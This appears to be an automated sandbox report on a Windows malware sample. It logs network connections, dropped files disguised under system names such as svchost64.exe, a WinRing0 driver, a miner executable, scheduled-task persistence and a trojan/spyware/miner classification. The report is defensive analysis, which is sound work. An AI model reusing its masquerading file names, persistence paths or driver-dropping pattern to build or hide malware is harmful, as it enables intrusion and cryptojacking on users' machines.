Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49872 version: TLS 1.2

Too many similar processes found

Source: conhost.exe	Process created: 91
Source: cmd.exe	Process created: 156

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Creates driver files

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Creates files inside the system directory

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs\sihost64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C2E440	6_2_00C2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C2E440	6_2_00C2E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C24CF0	6_2_00C24CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C63068	6_2_00C63068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C57D83	6_2_00C57D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C24AF0	6_2_00C24AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C6765B	6_2_00C6765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C62BD0	6_2_00C62BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C6777B	6_2_00C6777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C66F09	6_2_00C66F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C68720	6_2_00C68720
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 107_2_00007FFD9BAC0ECD	107_2_00007FFD9BAC0ECD
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA7642	139_2_00007FFD9BAA7642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA6896	139_2_00007FFD9BAA6896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA1141	139_2_00007FFD9BAA1141
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC5772	144_2_00007FFD9BAC5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC49C6	144_2_00007FFD9BAC49C6
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA97642	149_2_00007FFD9BA97642
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA96896	149_2_00007FFD9BA96896
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA9108D	149_2_00007FFD9BA9108D
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD5772	159_2_00007FFD9BAD5772
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD49C6	159_2_00007FFD9BAD49C6

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: String function: 00C37870 appears 33 times

PE file contains more sections than normal

Source: Microsoft-Edge.exe.7.dr	Static PE information: Number of sections : 18 > 10
Source: loader_5879465914.exe.6.dr	Static PE information: Number of sections : 18 > 10
Source: loader_5879465914[1].exe.6.dr	Static PE information: Number of sections : 18 > 10

PE file does not import any functions

Source: miner2.0.exe.82.dr	Static PE information: No import functions for PE file found
Source: svchost64.exe.85.dr	Static PE information: No import functions for PE file found
Source: services64.exe.107.dr	Static PE information: No import functions for PE file found
Source: sihost64.exe.139.dr	Static PE information: No import functions for PE file found

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: miner2.0.exe.82.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost64.exe.85.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services64.exe.107.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: file.exe	Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973763198228883
Source: axplong.exe.0.dr	Static PE information: Section: nataabbx ZLIB complexity 0.9948613709117556

Source: svchost64.exe.85.dr, yelshopxrkiqn.cs

Source: WR64.sys.139.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@314/69@4/4

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 50%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
